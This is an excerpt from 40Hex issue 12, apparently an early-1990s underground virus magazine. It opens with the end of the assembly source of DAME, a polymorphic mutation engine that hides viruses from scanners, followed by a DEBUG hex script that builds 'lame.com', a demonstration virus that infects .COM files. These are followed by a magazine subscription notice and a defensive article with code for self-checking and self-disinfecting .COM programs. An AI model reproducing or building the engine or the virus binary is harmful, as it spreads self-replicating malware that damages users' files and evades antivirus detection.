_xor_reg_xxxx: or al,030 jmp _81h_ xor_reg_reg: mov si,offset xor_reg_reg_table go_handle_jmp_table3: jmp short go_handle_jmp_table2 _xor_reg_reg: mov ah,33 ; The following is the master encoder. It handles most traditional encodings ; with mod/reg/rm or mod/xxx/rm. _mod_reg_rm_direction: or al,al ; If al is a memory pointer, js dodirection ; then we need to swap regs or dl,dl ; If dl is a memory pointer, js _mod_reg_rm ; we cannot swap registers call one_in_two ; Otherwise there is a 50% js _mod_reg_rm ; chance of swapping registers dodirection: xchg al,dl ; Swap the registers and adjust sub ah,2 ; the opcode to compensate _mod_reg_rm: shl al,1 ; Move al to the reg field shl al,1 shl al,1 or al,dl ; Move dl to the rm field mod_xxx_rm: or al,al ; Is al a memory pointer? js no_no_reg ; If so, skip next line or al,0c0 ; Mark register in mod field no_no_reg: xchg ah,al test ah,40 jnz exit_mod_reg_rm test cl,1 jnz continue_mod_xxx_rm push ax mov al,2e stosb pop ax continue_mod_xxx_rm: stosw mov si,cs:[bp] ; Store the patch location add si,si ; for the memory in the mov cs:[si+bp+2],di ; appropriate table for later inc word ptr cs:[bp] ; adjustment ; cs: overrides needed for bp mov al,_relocate_amt cbw exit_mod_reg_rm: stosw ret add_reg_reg: mov si,offset add_reg_reg_table jmp short go_handle_jmp_table3 _add_reg_reg: mov ah,3 jmp short _mod_reg_rm_direction sub_reg_reg: mov si,offset sub_reg_reg_table go_handle_jmp_table4: jmp short go_handle_jmp_table3 _sub_reg_reg: mov ah,2bh jmp short _mod_reg_rm_direction _add_reg_xxxx_inc_add: call inc_reg dec dx jmp short add_reg_xxxx _add_reg_xxxx_dec_add: call dec_reg inc dx jmp short add_reg_xxxx _add_reg_xxxx_add_add: call get_rand_bx push bx sub dx,bx call add_reg_xxxx pop dx jmp short add_reg_xxxx add_reg_xxxx1: neg dx add_reg_xxxx: or dx,dx jnz cont return1: ret cont: mov si,offset add_reg_xxxx_table jmp go_handle_jmp_table4 _add_reg_xxxx: or al,al jz _add_ax_xxxx _81h_: or al,al js __81h add al,0c0 __81h: mov ah,81 mod_xxx_rm_stosw: call mod_xxx_rm _encode_dx_: xchg ax,dx stosw ret _add_ax_xxxx: mov al,5 _encode_al_dx_: stosb jmp short _encode_dx_ sub_reg_xxxx1: neg dx sub_reg_xxxx: _sub_reg_xxxx: or dx,dx ; SUBtracting anything? jz return1 ; If not, we are done or al,al ; SUB AX, XXXX? jz _sub_ax_xxxx ; If so, we encode in 3 bytes add al,028 ; Otherwise do the standard jmp short _81h_ ; mod/reg/rm deal _sub_ax_xxxx: mov al,2dh jmp short _encode_al_dx_ dec_reg: push ax add al,8 jmp short _dec_inc_reg inc_reg: push ax _dec_inc_reg: or al,al jns _norm_inc mov ah,0ff call mod_xxx_rm pop ax ret _norm_inc: add al,40 stosb pop ax ret _mov_reg_reg_3rd_reg: mov bx,offset mov_reg_reg mov si,offset mov_xchg_reg_reg or al,al ; Is reg1 a pointer register? js reg_to_reg1 ; If so, we cannot use XCHG jmp short reg_to_reg xor_reg_reg_reg_reg: mov bx,offset _xor_reg_reg jmp short reg_to_reg1 add_reg_reg_reg_reg: mov bx,offset _add_reg_reg jmp short reg_to_reg1 sub_reg_reg_reg_reg: mov bx,offset _sub_reg_reg reg_to_reg1: mov si,bx reg_to_reg: call free_regs jne no_free_regs push ax si call get_another ; Get unused register (reg3) call mov_reg_reg ; MOV REG3,REG2 pop si dx xchg ax,dx finish_reg_clear_dx: push dx call si pop ax jmp clear_reg _xor_reg_xxxx_reg_reg: mov bx,offset xor_reg_xxxx mov si,offset xor_reg_reg xxxx_to_reg: call free_regs jne no_free_regs push ax si call get_another ; Get unused register (reg3) call mov_reg_xxxx ; MOV REG3,XXXX xchg ax,dx pop si ax jmp short finish_reg_clear_dx no_free_regs: jmp bx _add_reg_xxxx_reg_reg: mov bx,offset add_reg_xxxx mov si,offset add_reg_reg jmp short xxxx_to_reg _mov_reg_xxxx_reg_reg: mov bx,offset mov_reg_xxxx mov si,offset mov_xchg_reg_reg jmp short xxxx_to_reg ; The following are a collection of tables used by the various encoding ; routines to determine which routine will be used. The first line in each ; table holds the mask for the encoding procedure. The second line holds the ; default routine which is used when nesting is disabled. The number of ; entries in each table must be a power of two. To adjust the probability of ; the occurence of any particular routine, simply vary the number of times it ; appears in the table relative to the other routines. ; The following table governs garbling. garbletable: db garbletableend - $ - 3 dw offset return dw offset return dw offset return dw offset return dw offset return dw offset garble_tworeg dw offset garble_tworeg dw offset garble_tworeg dw offset garble_onereg dw offset garble_onereg dw offset garble_onereg dw offset garble_onebyte dw offset garble_onebyte dw offset garble_onebyte dw offset garble_jmpcond dw offset clear_PIQ garbletableend: ; This table is used by the one byte garbler. It is intuitively obvious. onebytetable: clc cmc stc cld std sti int 3 lock ; This table is used by the one register garbler. When each of the functions ; in the table is called, ax holds a random, unused register, and dx holds a ; random number. oneregtable: db oneregtableend - $ - 3 dw offset xor_reg_xxxx dw offset mov_reg_xxxx dw offset sub_reg_xxxx dw offset add_reg_xxxx dw offset dec_reg dw offset inc_reg dw offset _ror dw offset _rol oneregtableend: ; This table is used to determine the decryption method oneregtable1: ; dx = random # db oneregtable1end - $ - 3 dw offset xor_reg_xxxx dw offset sub_reg_xxxx dw offset add_reg_xxxx dw offset add_reg_xxxx dw offset dec_reg dw offset inc_reg dw offset _ror dw offset _rol oneregtable1end: ; This table is used to determine the encryption method oneregtable2: ; dx = random # db oneregtable2end - $ - 3 dw offset xor_reg_xxxx dw offset add_reg_xxxx dw offset sub_reg_xxxx dw offset sub_reg_xxxx dw offset inc_reg dw offset dec_reg dw offset _rol dw offset _ror oneregtable2end: tworegtable: ; dl = any register db tworegtableend - $ - 3 dw offset xor_reg_reg dw offset mov_reg_reg dw offset sub_reg_reg dw offset add_reg_reg tworegtableend: tworegtable1: ; dl = any register db tworegtable1end - $ - 3 dw offset xor_reg_reg dw offset xor_reg_reg dw offset sub_reg_reg dw offset add_reg_reg tworegtable1end: tworegtable2: ; dl = any register db tworegtable2end - $ - 3 dw offset xor_reg_reg dw offset xor_reg_reg dw offset add_reg_reg dw offset sub_reg_reg tworegtable2end: mov_reg_xxxx_table: db mov_reg_xxxx_table_end - $ - 3 dw offset _mov_reg_xxxx dw offset _mov_reg_xxxx_reg_reg dw offset _mov_reg_xxxx_mov_add dw offset _mov_reg_xxxx_mov_al_ah dw offset _mov_reg_xxxx_mov_xor dw offset _mov_reg_xxxx_xor_add dw offset _mov_reg_xxxx_mov_rol dw offset _mov_reg_xxxx_mov_ror mov_reg_xxxx_table_end: mov_reg_reg_table: db mov_reg_reg_table_end - $ - 3 dw offset _mov_reg_reg dw offset _mov_reg_reg dw offset _mov_reg_reg_3rd_reg dw offset _mov_reg_reg_push_pop mov_reg_reg_table_end: xchg_reg_reg_table: db xchg_reg_reg_table_end - $ - 3 dw offset _xchg_reg_reg dw offset _xchg_reg_reg dw offset _xchg_reg_reg_push_pop dw offset _xchg_reg_reg_3rd_reg xchg_reg_reg_table_end: xor_reg_xxxx_table: db xor_reg_xxxx_table_end - $ - 3 dw offset _xor_reg_xxxx dw offset _xor_reg_xxxx dw offset _xor_reg_xxxx_reg_reg dw offset xor_reg_xxxx_xor_xor xor_reg_xxxx_table_end: xor_reg_reg_table: db xor_reg_reg_table_end - $ - 3 dw offset _xor_reg_reg dw offset xor_reg_reg_reg_reg xor_reg_reg_table_end: add_reg_reg_table: db add_reg_reg_table_end - $ - 3 dw offset _add_reg_reg dw offset add_reg_reg_reg_reg add_reg_reg_table_end: sub_reg_reg_table: db sub_reg_reg_table_end - $ - 3 dw offset _sub_reg_reg dw offset sub_reg_reg_reg_reg sub_reg_reg_table_end: add_reg_xxxx_table: db add_reg_xxxx_table_end - $ - 3 dw offset _add_reg_xxxx dw offset _add_reg_xxxx dw offset _add_reg_xxxx_reg_reg dw offset sub_reg_xxxx1 dw offset _add_reg_xxxx_inc_add dw offset _add_reg_xxxx_dec_add dw offset _add_reg_xxxx_add_add dw offset _add_reg_xxxx_add_add add_reg_xxxx_table_end: endif if not vars eq 0 ; if (vars != 0) ; _nest is needed to prevent the infinite recursion which is possible in a ; routine such as the one used by DAME. If this value goes above the ; threshold value (defined as MAXNEST), then no further garbling/obfuscating ; will occur. _nest db ? ; This is used by the routine mod_reg_rm when encoding memory accessing ; instructions. The value in _relocate_amt is later added to the relocation ; value to determine the final value of the memory adjustment. For example, ; we initially have, as the encryption instruction: ; add [bx+0],ax ; Let's say _relocate_amt is set to 2. Now the instruction reads: ; add [bx+2],ax ; Finally, the relocate procedure alters this to: ; add [bx+202],ax ; or whatever the appropriate value is. ; ; This value is used in double word encryptions. _relocate_amt db ? ; Various memory locations which we must keep track of for calculations: _loopstartencrypt dw ? _loopstartdecrypt dw ? _encryptpointer dw ? _decryptpointer dw ? _decryptpointer2 dw ? _start_encrypt dw ? _start_decrypt dw ? beginclear1: ; _used_regs is the register tracker. Each byte corresponds to a register. ; AX = 0, CX = 1, DX = 2, etc. Each byte may be either set or zero. If it ; is zero, then the register's current value is unimportant to the routine. ; If it is any other value, then the routine should not play with the value ; contained in the register (at least without saving it first). _used_regs db 8 dup (?) ; 0 = unused ; The following four variables contain the addresses in current memory which ; contain the patch locations for the memory addressing instructions, i.e. ; XOR WORD PTR [bx+3212],3212 ; It is used at the end of the master encoding routine. _encrypt_relocate_num dw ? _encrypt_relocator dw 8 dup (?) _decrypt_relocate_num dw ? _decrypt_relocator dw 10 dup (?) endclear1: _encrypt_length dw ? ; The number of bytes to encrypt ; (based upon alignment) _counter_value dw ? ; Forwards or backwards _decrypt_value dw ? ; Not necessarily the crypt key _pointer_value1 dw ? ; Pointer register 1's initial value _pointer_value2 dw ? ; Pointer register 2's initial value _counter_reg db ? _encrypt_reg db ? _pointer_reg1 db ? ; 4 = not in use _pointer_reg2 db ? _pointer_rm db ? ; Holds r/m value for pointer registers _maxnest db ? _kludge dw ? endif --End DAME.ASM--Begin LAME.SCR------------------------------------------------- N lame.com E 0100 E9 37 15 E8 01 08 CD 20 00 00 2A 2E 63 6F 6D 00 E 0110 2E 2E 00 0D 54 68 69 73 20 69 73 20 61 20 6C 61 E 0120 6D 65 20 76 69 72 75 73 20 73 6C 61 70 70 65 64 E 0130 20 74 6F 67 65 74 68 65 72 20 62 79 20 44 41 2F E 0140 50 53 0D 0A 54 6F 20 64 65 6D 6F 6E 73 74 72 61 E 0150 74 65 20 44 41 4D 45 20 30 2E 39 31 0D 0A 1A 52 E 0160 51 53 B4 2C CD 21 E4 40 8A E0 E4 40 33 C1 33 D0 E 0170 EB 1C 52 51 53 E4 40 05 00 00 BA 00 00 B9 07 00 E 0180 D1 E0 D1 D2 8A D8 32 DE 79 02 FE C0 E2 F2 A3 78 E 0190 01 89 16 7B 01 8A C2 5B 59 5A C3 03 84 87 05 84 E 01A0 86 07 84 85 06 84 84 05 07 83 05 06 82 03 07 81 E 01B0 03 06 80 07 05 83 06 05 82 07 03 81 06 03 80 03 E 01C0 07 0B 0F 13 17 1B 1F 5F 5D 5E 5A 59 5B 58 FC 50 E 01D0 53 51 52 56 55 57 E8 0E 00 5F 51 57 FF D7 5F 59 E 01E0 5D 5E 5A 5B 5B 58 C3 FC 50 B8 1F 0A 97 AB 96 AB E 01F0 AB 92 AB 93 AB 87 CA 33 C0 B9 1E 00 F3 AB E8 71 E 0200 FF 25 F0 FF 59 33 C8 E8 69 03 83 E3 07 8A 87 BF E 0210 01 98 03 D0 F7 D0 23 D0 8B C2 AB D1 E8 F6 C5 40 E 0220 74 02 D1 E8 F6 C5 10 75 02 F7 D8 AB 52 E8 42 FF E 0230 AB 58 F6 C5 20 75 02 F7 D8 33 DB F6 C5 80 74 05 E 0240 E8 30 03 2B C3 AB 93 AB E8 E6 02 BF 6F 0A B0 84 E 0250 F6 C5 08 74 09 E8 1A FF A3 6B 0A E8 DF 02 AA 92 E 0260 B0 84 E8 06 03 78 03 E8 D3 02 AA 3B C2 77 01 92 E 0270 8A E2 3D 05 03 74 D1 3D 07 06 74 CC BE 9B 01 B8 E 0280 03 00 F6 C5 80 74 05 83 C6 0C 04 04 E8 E4 02 23 E 0290 D8 03 F3 03 DB 03 F3 AD 8B D8 83 E3 07 80 BF 29 E 02A0 0A 00 75 D8 8A DC 0A DB 78 07 80 BF 29 0A 00 75 E 02B0 CB AB A4 E8 BC FE 24 0F 3C 0A 77 F7 AA E8 71 02 E 02C0 8B 3E 21 0A E8 07 03 BE 6F 0A 56 E8 A5 02 83 E3 E 02D0 03 8A 00 98 A8 80 75 F3 80 8F 6F 0A 80 8B F0 FE E 02E0 84 29 0A 03 DB 8B 97 67 0A C6 06 19 0A 00 90 E8 E 02F0 5F 03 E8 D9 02 E8 1F 02 51 80 E1 F8 E8 9B 03 59 E 0300 89 3E 1F 0A 5E BA 04 00 AC A8 80 74 B3 4A 75 F8 E 0310 BE 1F 0A BF 1B 0A A5 A5 C6 06 1A 0A 00 90 E8 8E E 0320 01 F6 C5 40 74 09 C6 06 1A 0A 02 90 E8 80 01 BB E 0330 1B 0A 51 80 E1 F8 E8 87 00 59 B8 FC C3 AB BE 33 E 0340 0A 8B 3E 25 0A 51 E8 4E 00 59 BB 1D 0A E8 70 00 E 0350 57 E8 DD 01 5F E8 76 02 F6 C1 08 75 0D F6 C5 20 E 0360 74 03 E8 31 02 E8 66 02 EB 1E 8B D7 2B 16 23 0A E 0370 03 16 27 0A 42 42 F7 DA 83 E2 0F 80 FA 0E 75 05 E 0380 F6 C5 20 74 03 E8 2F 02 89 3E 21 0A BE 45 0A 2B E 0390 3E 23 0A 03 3E 27 0A F6 C5 20 74 04 03 3E 65 0A E 03A0 2B 3E 6B 0A 2B 3E 6D 0A 8B 4C FE E3 08 97 97 AD E 03B0 97 01 05 E2 F9 8B 3E 21 0A 8B CF 2B 0E 23 0A C3 E 03C0 8B 7F 04 90 53 C6 06 19 0A 00 90 A0 71 0A 25 07 E 03D0 00 BA 02 00 F6 C5 40 74 02 D1 E2 F6 C5 20 74 02 E 03E0 F7 DA F6 C5 80 74 26 D1 FA 50 E8 B2 03 A0 72 0A E 03F0 25 07 00 E8 A9 03 5B F6 C5 08 75 14 53 92 E8 3C E 0400 01 E8 AE 02 5A E8 6B 03 E8 47 01 EB 03 E8 8F 03 E 0410 B2 75 A0 6F 0A 25 07 00 3C 04 74 1D 52 BA 01 00 E 0420 F6 C5 10 74 10 3C 01 75 0A E8 3F 01 78 05 5A B2 E 0430 E2 EB 06 F7 DA E8 67 03 5A 5B 8B 07 2B C7 48 48 E 0440 86 E0 8A C2 0A E4 78 05 58 58 E9 7A FD AB 89 7F E 0450 04 90 C3 80 E5 FB E8 12 01 78 03 80 CD 04 8B 3E E 0460 21 0A BD 43 0A E8 66 01 33 C0 A0 73 0A E8 7C 00 E 0470 E8 B5 00 56 52 56 52 F6 C5 04 74 0B 92 E8 BD 00 E 0480 E8 2F 02 89 16 75 0A 5A 5E E8 67 01 53 E8 3E 01 E 0490 F6 C5 04 74 0C 92 A1 75 0A 50 E8 15 02 E8 B1 00 E 04A0 58 BD 31 0A E8 70 00 5B 5A 5E E8 7B 00 EB 30 E8 E 04B0 0B 00 E8 BD FC 3D 06 00 72 03 E8 96 FF 8B 3E 21 E 04C0 0A E8 0A 01 A0 70 0A 25 07 00 3C 04 74 49 E8 A2 E 04D0 00 80 FB C0 77 41 E8 13 00 E8 1A 01 E8 38 00 51 E 04E0 80 E1 F8 FF 50 01 59 89 3E 1F 0A C3 C6 06 19 0A E 04F0 00 90 E8 76 00 78 08 E8 79 00 BE 6D 08 EB 15 E8 E 0500 71 00 83 E3 07 80 FB 04 74 F5 80 BF 29 0A 00 74 E 0510 EE BE A0 08 87 D3 C3 89 3E 21 0A 50 A0 74 0A A2 E 0520 19 0A 58 8B 3E 1F 0A C3 50 AC 98 03 F0 58 46 46 E 0530 C3 33 C0 BF 29 0A AB AB 40 AB 48 AB C3 E8 32 FC E 0540 25 07 00 8B F0 80 BC 29 0A 00 75 F1 FE 84 29 0A E 0550 C3 92 8B F0 C6 84 29 0A 00 C3 50 51 57 BF 29 0A E 0560 B9 08 00 33 C0 F2 AE 5F 59 58 C3 50 E8 03 FC 0B E 0570 C0 58 C3 93 E8 FB FB 93 C3 92 24 07 BB 65 08 D7 E 0580 AA C3 92 25 0F 00 0C 70 AB 57 E8 4A 00 8B C7 5B E 0590 2B C3 88 47 FF C3 E8 D9 FB 8A D4 83 E2 0F 25 03 E 05A0 00 74 1B 48 74 11 B0 E9 AA 92 AB 51 91 E3 06 E8 E 05B0 C0 FB AA E2 FA 59 C3 B0 EB AA 92 AA EB ED B0 E8 E 05C0 E8 E5 FF E8 11 00 E8 74 FF E8 86 FF EB 71 C6 06 E 05D0 19 0A 00 90 E8 00 00 E8 80 FF 75 9C F6 C1 02 74 E 05E0 97 50 52 56 E8 8B FB 92 E8 52 FF E8 64 FF BE 44 E 05F0 08 EB 06 E8 E1 FF 50 52 56 50 AC 98 E8 74 FF 23 E 0600 D8 58 F6 C1 04 75 0F FE 06 19 0A 50 A0 74 0A 38 E 0610 06 19 0A 58 72 02 33 DB 53 FF 10 5B 5E 5A 58 C3 E 0620 BE A0 08 83 E2 07 EB CE BE 6D 08 EB C9 0A C0 78 E 0630 09 E8 37 FF 78 04 04 50 AA C3 05 30 FF EB 0F 0A E 0640 C0 78 09 E8 25 FF 78 04 04 58 AA C3 B4 8F E9 F6 E 0650 00 BE BB 08 EB 9D E8 1A FF 53 2B D3 E8 F2 FF 5A E 0660 EB 23 3C 04 73 34 50 52 E8 41 00 5A 58 86 F2 EB E 0670 39 E8 FF FE 53 33 D3 E8 D7 FF 5A E9 9E 00 52 8B E 0680 D0 E8 A2 00 5A E9 17 01 D1 CA E8 C4 FF EB 07 D1 E 0690 C2 E8 BD FF 0C 08 B4 D1 EB B4 E8 CE FE 78 06 04 E 06A0 B8 AA 92 AB C3 B4 C7 E9 0B 01 04 04 04 B0 8A E2 E 06B0 AB C3 BE CC 08 EB 9D 50 92 E8 71 FF 58 EB 80 B4 E 06C0 8B EB 6A E8 A5 FE 78 EA BE D5 08 EB 87 52 50 52 E 06D0 E8 5A FF 58 E8 56 FF 58 E8 64 FF 58 E9 60 FF E8 E 06E0 78 FE 75 14 52 50 E8 54 FE E8 D7 FF 5A E8 D8 FF E 06F0 5A 92 E8 CE FF E9 59 FE 0A C0 78 0A 3A C2 7F 02 E 0700 86 C2 0A D2 74 06 86 C2 B4 87 EB 33 04 90 AA C3 E 0710 E8 60 FE 53 33 D3 E8 03 00 5A EB 00 BE DE 08 EB E 0720 AA 0C 30 E9 87 00 BE E7 08 EB A0 B4 33 0A C0 78 E 0730 09 0A D2 78 0A E8 33 FE 78 05 86 C2 80 EC 02 D0 E 0740 E0 D0 E0 D0 E0 0A C2 0A C0 78 02 0C C0 86 E0 F6 E 0750 C4 40 75 1D F6 C1 01 75 05 50 B0 2E AA 58 AB 2E E 0760 8B 76 00 03 F6 2E 89 7A 02 2E FF 46 00 A0 1A 0A E 0770 98 AB C3 BE EC 08 EB B1 B4 03 EB B1 BE F1 08 EB E 0780 A8 B4 2B EB A8 E8 4F 00 4A EB 14 E8 44 00 42 EB E 0790 0E E8 DF FD 53 2B D3 E8 05 00 5A EB 02 F7 DA 0B E 07A0 D2 75 01 C3 BE F6 08 EB D6 0A C0 74 0E 0A C0 78 E 07B0 02 04 C0 B4 81 E8 8F FF 92 AB C3 B0 05 AA EB F8 E 07C0 F7 DA 0B D2 74 DD 0A C0 74 04 04 28 EB DF B0 2D E 07D0 EB EB 50 04 08 EB 01 50 0A C0 79 07 B4 FF E8 66 E 07E0 FF 58 C3 04 40 AA 58 C3 BB B2 06 BE C3 06 0A C0 E 07F0 78 0F EB 0F BB 2B 07 EB 08 BB 78 07 EB 03 BB 81 E 0800 07 8B F3 E8 54 FD 75 2A 50 56 E8 30 FD E8 A2 FE E 0810 5E 5A 92 52 FF D6 58 E9 38 FD BB 1C 07 BE 26 07 E 0820 E8 37 FD 75 0D 50 56 E8 13 FD E8 24 FE 92 5E 58 E 0830 EB E1 FF E3 BB 9F 07 BE 73 07 EB E4 BB 51 06 BE E 0840 C3 06 EB DC 1E 78 05 78 05 78 05 78 05 78 05 20 E 0850 06 20 06 20 06 28 06 28 06 28 06 79 05 79 05 79 E 0860 05 82 05 96 05 F8 F5 F9 FC FD FB CC F0 0E 1C 07 E 0870 51 06 C2 07 9F 07 D2 07 D7 07 94 06 96 06 0E 1C E 0880 07 C2 07 9F 07 9F 07 D2 07 D7 07 94 06 96 06 0E E 0890 1C 07 9F 07 C2 07 C2 07 D7 07 D2 07 96 06 94 06 E 08A0 06 26 07 B2 06 7C 07 73 07 06 26 07 26 07 7C 07 E 08B0 73 07 06 26 07 26 07 73 07 7C 07 0E 9A 06 3C 08 E 08C0 56 06 62 06 71 06 7E 06 88 06 8F 06 06 BF 06 BF E 08D0 06 E8 07 B7 06 06 F8 06 F8 06 CD 06 DF 06 06 21 E 08E0 07 21 07 1A 08 10 07 02 2B 07 F4 07 02 78 07 F9 E 08F0 07 02 81 07 FE 07 0E A9 07 A9 07 34 08 C0 07 85 E 0900 07 8B 07 91 07 91 07 5E 8B C6 B1 04 D3 E8 2D 10 E 0910 00 03 C3 BB 19 09 50 53 CB BF 00 01 06 57 06 06 E 0920 A5 A5 0E 0E 07 1F B4 1A BA B8 0A CD 21 B4 47 99 E 0930 BE 78 0A C6 44 FF 5C CD 21 C6 06 18 0A 04 90 E8 E 0940 1D F8 B4 4E BA 0A 01 CD 21 73 1A B4 3B BA 10 01 E 0950 CD 21 73 EE B4 3B BA 77 0A CD 21 07 1F BA 80 00 E 0960 B4 1A CD 21 CB B8 00 3D BA D6 0A CD 21 72 26 93 E 0970 B4 3F B9 04 00 BA 06 01 CD 21 B4 3E CD 21 81 3E E 0980 06 01 FC E9 74 0F 02 C4 3C A7 74 09 E8 0A 00 FE E 0990 0E 18 0A 74 BF B4 4F EB AE B8 00 3D BA D6 0A CD E 09A0 21 50 93 B8 20 12 CD 2F B8 16 12 26 8A 1D B7 00 E 09B0 CD 2F 5B 26 C7 45 02 02 00 26 8B 45 11 8B E8 B9 E 09C0 04 00 2B C1 A3 16 0A B4 40 BA 14 0A CD 21 26 89 E 09D0 6D 15 06 57 0E 07 BE 00 01 BF 04 0D B9 8B 04 F3 E 09E0 A5 B8 0B 00 BA 04 0D B9 16 09 BE 64 0B BF E4 0A E 09F0 52 53 56 8B DD FE C7 E8 D4 F7 B4 40 5A 5B CD 21 E 0A00 B4 40 B9 16 09 5A CD 21 5F 07 26 80 4D 06 40 B4 E 0A10 3E CD 21 C3 FC E9 E 163A C6 06 00 01 FC C7 E 1640 06 01 01 8C DB 33 FF 0E 57 0E 0E E9 D4 F2 R CX 154E W Q --End LAME.SCR----------------------------------------------------------------- DA 40Hex Number 12 Volume 3 Issue 3 File 002 Extracted From CuD [5.66] ------------------------- Subject: File 3--40Hex is now a print magazine From: fortyhex (geoff heap) Date: Mon, 16 Aug 93 17:19:02 EDT 40Hex, the world's most popular underground virus magazine is now available in two versions -- the familiar online magazine and a new printed magazine. In the past two and a half years, 40Hex has become the most popular virus magazine in the underground. The new printed magazine (dubbed 40Hex Hardcopy) is intended for anyone who wishes to learn as much as they can about computer viruses -- from the source, the virus writers. Each issue will contain -- o A complete virus disassembly, fully commented in the 40Hex tradition, o Detailed programming articles, intended for those fluent in assembly, o Introductory articles intended to help those on all levels of ability, and o Interviews with virus writers and virus researchers. Also included is an editorial column, which will provide a forum for discussions about any virus related issue. Submissions from both sides of the argument are welcome, and will be given an equal voice. Subscriptions -- The price for 40Hex Hardcopy is $35 per year for individuals, $50 per year for corporations. The magazine is bimonthly (six issues per year). The online magazine is available free of charge from many privately operated BBSs. You may receive a disk with the latest issue from us for $5. Please send a note specifying whether you would like a 5 1/4 or a 3 1/2 inch disk. Correspondence -- Subscription requests should be addressed to Subscriptions 40Hex Magazine PO Box 252 New City, NY, 10956 Article submissions should be addressed to Articles 40Hex Magazine PO Box 252 New City, NY, 10956 Letters to the editors should be addressed to The Editors 40Hex Magazine PO Box 252 New City, NY, 10956 if you have access to internet E-Mail, you can send a note to fortyhex@mindvox.phantom.com note: manuscripts will not be returned to the sender unless they are accompanied by postage. All submissions must be marked "manuscript submitted for publication." The online magazine will still be published, and will remain separate from the new hardcopy magazine with no article overlap. +++ Leni Niles Co-Editor, 40Hex Hardcopy --------------------------------------------------------------------- 40Hex Number 12 Volume 3 Issue 3 File 003 Self Checking Executable Files Demogorgon Phalcon/Skism In this article I will explain a method that will allow .COM files to be immune to simple viruses. In order to infect a .COM file, a virus must change several bytes at the beginning of the code. Before the virus returns control to the original program, it will 'disinfect' it into memory, so that the program runs as it did before infection. This disinfection process is crucial, because it means that the image on the disk will not be the same as the memory image of the program. This article describes a method by which a .COM file can perform a self-check by reading its disk image and comparing it to its memory image. The full pathname of the program that is being executed by DOS is located in the environment block. The segment of the environment block can be read from the PSP. It is located at offset [2Ch]. The name of the program is the last entry in the environment block, and can be located by searching for two zeros. The next byte after the two zeros contains the length of the string that follows it. After the length is an ASCIIZ string containing the pathname of the current process. The following code opens the file being executed: nish: mov es, word ptr ds:[2Ch] ; segment of environment xor ax, ax mov di, 1 loop_0: dec di scasw jne loop_0 mov dx, di add dx, 2 ; start of pathname push es pop ds mov ax, 3D02h ; open, read/write access int 21h Next, we must read in the file (using dos services function 3Fh, read file or device). We can read the file into the heap space after the program, as long as we are sure we will not overwrite the stack. The sample program in this file reads itself in entirely, but remember, it is not necessary to do so. It is only necessary to read and compare the first few bytes. Also, the program could read itself in blocks instead of all at once. If a file finds itself to be infected, it should report this to the user. Remember, even though the file knows it is infected, the virus has already executed. Memory resident viruses will already have loaded themselves into memory, and direct action viruses will already have infected other files on the drive. Thus, any virus that employs disinfection on the fly will be able to avoid detection and removal. Here is the full source to the self checking program: ;();();();();();();();();();();();();();();();();();();();();() .model tiny .code org 100h start: mov es, word ptr ds:[2Ch] ; dos environment block xor ax, ax mov di, 1 loop_0: dec di scasw jne loop_0 mov dx, di add dx, 2 ; <- point to current push es ; process name pop ds mov ah, 3Dh ; open file with handle int 21h jc bad ; error opening file ? mov bx, ax push cs push cs pop es pop ds ; I am a com file. mov cx, heap - start ; length lea dx, heap ; where to read file into mov ah, 3Fh ; read file or device int 21h jc bad ; error reading file ? ; here, do a byte for byte compare lea si, start lea di, heap repe cmpsb ; compare 'em jne bad lea dx, clean mov ah, 9 int 21h jmp quit_ bad: mov ah, 9 lea dx, infected int 21h quit_: mov ax, 4C00h int 21h clean db 'Self check passed.$' infected db 'Self check failed. Program is probably infected.$' heap: end start ;();();();();();();();();();();();();();();();();();();();();() While some self checking routines opt to use a crc or checksum error detection method, the byte for byte method is both faster and more accurate. Weak points: This routine will not work against a stealth virus which employs disinfection on the fly. Such viruses take over the dos interrupt (int 21) and disinfect all files that are opened and read from. As the routine in this article attempts to read itself into memory, the stealth virus would disinfect it and write an uninfected copy to ram. Of course, there are ways to defeat this. If this program were to use some sort of tunneling, it could bypass the stealth virus and call DOS directly. That way, infections by even the most sophisticated viruses would be detectable. Disinfection: So, now you can write programs that will detect if they have been infected. How about disinfection? This too is possible. Most viruses simply replace the first three bytes of the executable file with a jump or a call, which transfers control to the virus code. Since only the first three bytes are going to be changed (in almost all cases), it will usually be possible for a program to disinfect itself by replacing the first three bytes with what is supposed to be there, and then truncating itself to the correct size. The next program writes the entire memory image to disk, rather than just the first three bytes. That way, it can be used to disinfect itself from all nonstealth viruses. The steps to disinfect are simple. First of all, you must move the file pointer back to the beginning of the file. Use interrupt 21, ah=42h for this. The AL register holds the move mode, which must be 00 in this case (move from beginning of file). CX:DX holds the 32bit number for how many bytes to move. Naturally, this should be 0:0. The second step is to write back the memory image to the file. Since the virus has already restored the first few bytes of our program in memory, we must simply write back to the original file, starting from 100h in the current code segment. i.e.: mov ah, 40h mov cx, heap - start ; bytes to write lea dx, start int 21h ; write file or device Finally, we must truncate the file back to its original size. To truncate a file, we must move the file pointer to the end and call the 'write file or device' function with cx, the bytes to write, equal to zero. To move the pointer, do this: mov ax, 4200h mov cx, (heap - start) SHR 16 ; high word of file ptr mov dx, (heap - start) ; low word of file ptr int 21h ; move file pointer Since we are dealing with .COM files here, it is safe to assume that cx, the most significant word of the file ptr, can be set to zero, because our entire file must fit into one segment. We do not need to calculate it as above. To truncate: xor cx, cx mov ah, 40h int 21h ; truncate file The full code for the self disinfecting program follows. ;();();();();();();();();();();();();();();();();();();();();() .model tiny .code org 100h start: mov es, word ptr ds:[2Ch] ; segment of environment xor ax, ax mov di, 1 loop_0: dec di scasw jne loop_0 mov dx, di add dx, 2 push es pop ds mov ax, 3D02h ; open, read/write access int 21h mov bx, ax ; handle into bx push cs push cs pop es pop ds mov cx, heap - start lea dx, heap mov ah, 3Fh ; read file or device int 21h jc quit_ ; can't read ? lea si, start lea di, heap repe cmpsb ; byte for byte compare jne bad lea dx, clean ; we are golden mov ah, 9 ; print string int 21h jmp main_program bad: mov ah, 9 ; we are infected lea dx, infected int 21h lea dx, disinfection int 21h ; now, disinfect. File handle is still in bx ; we must move the file pointer to the beginning xor cx, cx xor dx, dx mov ax, 4200h int 21h ; move file pointer mov ah, 40h ; 40hex! mov cx, heap - start lea dx, start int 21h ; write file or device jnc success lea dx, not__ mov ah, 9 int 21h success:mov ah, 9 lea dx, successful int 21h xor cx, cx mov ah, 40h ; 40hex! int 21h ; truncate file main_program: quit_: mov ax, 4C00h int 21h disinfection db 0Dh, 0Ah, 'Disinfection $' not__ db 'not ' successful db 'successful.$' clean db 'Self check passed.$' infected db 'Self check failed. Program is probably ' db 'infected.$' heap: end start ;();();();();();();();();();();();();();();();();();();();();() Weak points: The same weak points that apply above 